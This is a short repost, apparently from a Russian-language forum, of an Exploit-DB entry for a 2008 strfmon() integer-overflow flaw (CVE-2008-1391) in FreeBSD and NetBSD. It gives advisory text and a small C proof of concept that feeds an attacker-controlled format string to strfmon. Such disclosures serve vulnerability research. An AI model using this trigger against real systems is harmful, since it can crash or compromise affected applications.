Exploit BSD (Multiple Distributions) - 'strfmon()' Integer Overflow

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
31550
Проверка EDB
  1. Пройдено
Автор
MAKSYMILIAN ARCIEMOWICZ
Тип уязвимости
DOS
Платформа
BSD
CVE
cve-2008-1391
Дата публикации
2008-03-27
C:
// source: https://www.securityfocus.com/bid/28479/info

Multiple BSD platforms are prone to an integer-overflow weakness.

An attacker can exploit this issue through other applications such as PHP to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.

This issue affects FreeBSD 6, 7 and NetBSD 4; other platforms may also be affected.

#include <stdio.h>
#include <monetary.h>

int main(int argc, char* argv[]){
char buff[51];
char *bux=buff;
int res;

res=strfmon(bux, 50, argv[1], "0");
return 0;
}
 
Источник
www.exploit-db.com

Похожие темы